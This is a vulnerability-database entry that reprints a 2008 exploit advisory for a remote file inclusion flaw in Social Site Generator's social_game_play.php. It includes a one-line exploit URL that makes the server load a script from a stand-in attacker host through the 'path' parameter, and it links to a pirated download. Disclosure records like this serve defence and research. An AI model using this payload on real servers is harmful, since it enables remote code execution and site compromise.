vBmad

vendor:

Social Site Generator

by:

vBmad

9.3

CVSS

HIGH

RFI (remote file include)

CWE

Product Name: Social Site Generator

Affected Version From: All versions

Affected Version To: All versions

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'path' parameter to 'social_game_play.php' script. This can be exploited to execute arbitrary PHP code by including a URL of a malicious script.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability. Sanitize all user-supplied input to prevent malicious code execution.

Source

Exploit-DB raw data:

< ------------------- vBmad ------------------- >

############################################################################################
#
# Application Name    : Social Site Generator
#
# Download               : http://rapidshare.com/files/118424866/Social.Site.Generator.v2._iAG_.Nulled.rar
#
# Vulnerable Type      : RFI (remote file include)
#
# Dork                       : search it :p
# 
# Vulnerable file         : social_game_play.php
#
# author                    : vBmad
#
# Team                     : nab3 Team & hamama team
#
# Greatz                    : ALLAH
#                                   rouchtekh & jonelo & okx all hackerz moroccan    &    bigg thnx to my teacher Roi-PhP
#                               www.nab3i.com     &    www.nab3.2007.fr   &    www.maroc-mp3.net
#
#
############################################################################################

< ------------------- vBmad ------------------- >|
\        /                                                          |
  \    /          uhh@hotmail.fr                            |
    \/__________________________________|


< -- Bug -- >

Exploit :

http://target/path/social_game_play.php?path=http://Evil-script?

< -- Bug -- >

#The majority of the versions are infected

# milw0rm.com [2008-05-31]